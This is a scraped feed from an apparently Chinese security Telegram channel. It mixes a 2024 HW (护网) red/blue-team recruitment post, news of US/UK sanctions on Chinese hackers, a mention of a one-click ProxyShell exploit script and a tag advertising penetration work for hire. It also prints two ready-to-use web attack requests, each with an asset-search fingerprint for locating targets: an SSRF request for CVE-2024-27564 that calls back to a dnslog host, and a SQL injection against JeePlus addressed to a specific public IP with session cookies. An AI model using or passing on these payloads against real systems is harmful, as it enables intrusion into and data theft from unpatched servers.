踹哈公寓 – Telegram
踹哈公寓
4.11K subscribers
589 photos
19 videos
307 files
357 links
Download Telegram
???
😐15
🤡2
https://mp.weixin.qq.com/s/vRreAsHrauGo2pPlN0OcwQ

ai与网安这是被棉花糖盗号了吗
2024护网招人,简历投递 @metaspolit233

1.你是中介吗?
是,但我抽成会很阳光的,投递简历后我/面试者/厂家三个人拉小群里协商薪资和我抽成的比例

2.包旅差费和食宿吗?
面试不包,面试过了包,发票报账

3.护网地点是哪里?时间?
北京,时间不知道

4.招哪种类型的,有什么要求?
红队蓝队都有,本科学历以上但是不要在校大学生(能力特别强或是之前有护网经验的另说)并且蓝队不要初级点鼠标凑数的

5.薪资?
绝对高于市场价(中介只有我一层),并且具体薪资可以和厂商在小群里面对面协商

6.下款时间会拖吗?
不会,拖了我狗中介自己掏腰包给你垫上好吧
👍15
踹哈公寓 pinned «2024护网招人,简历投递 @metaspolit233 1.你是中介吗? 是,但我抽成会很阳光的,投递简历后我/面试者/厂家三个人拉小群里协商薪资和我抽成的比例 2.包旅差费和食宿吗? 面试不包,面试过了包,发票报账 3.护网地点是哪里?时间? 北京,时间不知道 4.招哪种类型的,有什么要求? 红队蓝队都有,本科学历以上但是不要在校大学生(能力特别强或是之前有护网经验的另说)并且蓝队不要初级点鼠标凑数的 5.薪资? 绝对高于市场价(中介只有我一层),并且具体薪资可以和厂商在小群里面对面协商 …»
2👎1
proxyshell攻击链自动化一键利用脚本,不需要邮箱账号密码。但是脚本毕竟是死的,这个拿去复现阿根廷那个军队邮服系统我反正没有成功,这周六尽量赶一篇文章出来分析一下这个攻击链
👍3
哪位群友
👍4
https://mp.weixin.qq.com/s/rH-rRMFpYcD9dsIU0CLplg

97年山东大学数学系毕业,那兔子好像还是宋浩的师兄
这辈子被 FBI认证的可能几乎没有,FBI warning 还是可以争取一下

3月26日,美国和英国政府宣布对武汉晓睿智科技有限责任公司(Wuhan Xiaoruizhi Science And Technology Company Ltd)和两个中国公民实施制裁。与此同时,美国司法部起诉七名中国黑客,美国国务院针对涉案中企和个人祭出千万美元悬赏
两名受制裁的中国男子分别为倪高彬(NI, Gaobin)及赵光宗(ZHAO, Guangzong)。美国财政部公布两人居住点湖北荆州市,指这两人和武汉晓睿智科技公司有关联。
https://mp.weixin.qq.com/s/bSUgccwEX_28EkThDnAE8w
#吃瓜 #渗透接单@shandian007
👍43
chatgpt pictureproxy.php SSRF漏洞(CVE-2024-27564)

icon_hash="-1999760920"

GET /pictureproxy.php?url=http://hbwqkb.dnslog.cn HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflate, brConnection: closeUpgrade-Insecure-Requests: 1
👍1
Jeeplus低代码开发平台存在SQL注入

app="JeePlus"

GET /sys/user/resetPassword?&mobile=13' HTTP/1.1
Host: 106.55.237.80
Accept-Language: zh-CN,zh;q=0.9
Cookie: jeeplus.session.id=b0e0c971d60e480d951257fca488a233; JSESSIONID=81A53BFE0490DE76275E5C7FD4D78A4B
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
🤣5